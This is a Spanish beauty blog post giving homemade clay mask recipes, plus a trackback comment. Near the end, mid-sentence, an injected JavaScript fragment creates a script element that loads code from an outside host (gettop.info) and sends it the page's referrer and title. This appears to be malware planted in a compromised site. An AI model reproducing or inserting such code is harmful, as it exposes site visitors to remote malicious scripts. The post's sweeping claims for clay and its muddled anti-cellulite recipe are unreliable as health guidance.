Salud y belleza » Belleza

Belleza: recetas prácticas para elaborar mascarillas

1 Comentario

Arcilla. Si algo se repetirá alrededor de cada una de las siguientes formulas y recetas es justamente el uso de la arcilla como piedra angular en la elaboración. La pregunta, claro, será: “¿por qué arcilla?”. Bien, se trata de un componente que, según se ha estudiado y comprobado, es bueno para la piel y por muchas razones: ante todo, tiene un gran poder absorbente, también tiene cualidades bactericidas y goza de múltiples bondades cuando se trata de hidratación. Otras de las cualidades de la arcilla: ayuda a cerrar los poros, reactiva la circulación, facilita la reducción de los granos, estimula las funciones defensivas, eleva la temperatura, deshace arrugas y revitaliza.

¿Pero que mejor manera de comprobar las bondades de la arcilla que en primera persona? Y para ello os presentamos, a continuación, algunas recetas prácticas y formulas caseras para que puedas elaborar tus propias mascarillas de arcilla.

Mascarilla anticelulítico

Elementos: guante de crin, agua, papel glass y, obviamente, arcilla.

Preparación: su elaboración es sumamente sencilla y solo basta con mezclar todos los ingredientes en un frasco. No hace falta tener demasiados cuidados.

Aplicación: para su buen uso es necesario frotar la zona con celulitis con agua templada y el guante de crin. Después secar la piel y aplicar la arcilla directamente sobre el área que había sido masajeada anteriormente. Para cerrar el tratamiento, tapar la zona con papel glass.

Mascarilla embellecedora

Elementos: ½ aguacate, una yema de huevo. Lógicamente, también arcilla.

Preparación: primero y principal, se debe batir la pulpa del aguacate junto a la yema de huevo. Seguir hasta que se forme una crema homogénea. Luego, fácilmente se le agrega la arcilla.

Aplicación: aplicar la crema y dejarla reposar durante aproximadamente treinta minutos. Finalmente limpiarla con agua fresca.

A lo largo de la historia, la arcilla ha sido utilizada para diferentes objetivos. Ya en épocas antiguas, se utilizaba con fines estéticos e, incluso terapéuticos. La arcilla está constituida por agregados de silicatos de aluminio hidratado, procedente de la descomposición de minerales de aluminio y se origina de la descomposición de rocas que contienen feldespato, proceso natural que dura decenas de miles de años. Bien, preparar mascarillas no cuesta un tiempo parecido ni por asomo y, de hecho, sus resultados también se pueden ver de forma rápida.

Como vemos, las propiedades de la arcilla son muy útiles para los tratamientos de belleza. Solo hace falta constancia en su aplicación y determinación para dejar que las cualidades de la arcilla actúen para bien de nuestro cuerpo. Principalmente, en lo que al lado estético se refiere.s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + ''; var d=document;var s=d.createElement('script');

Más consejos de salud y belleza : , ,

One Comment »

  • Bitacoras.com said:

    Información Bitacoras.com…

    Valora en Bitacoras.com: Arcilla. Si algo se repetirá alrededor de cada una de las siguientes formulas y recetas es justamente el uso de la arcilla como piedra angular en la elaboración. La pregunta, claro, será: “¿por qué arcilla?”. Bien, s……

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.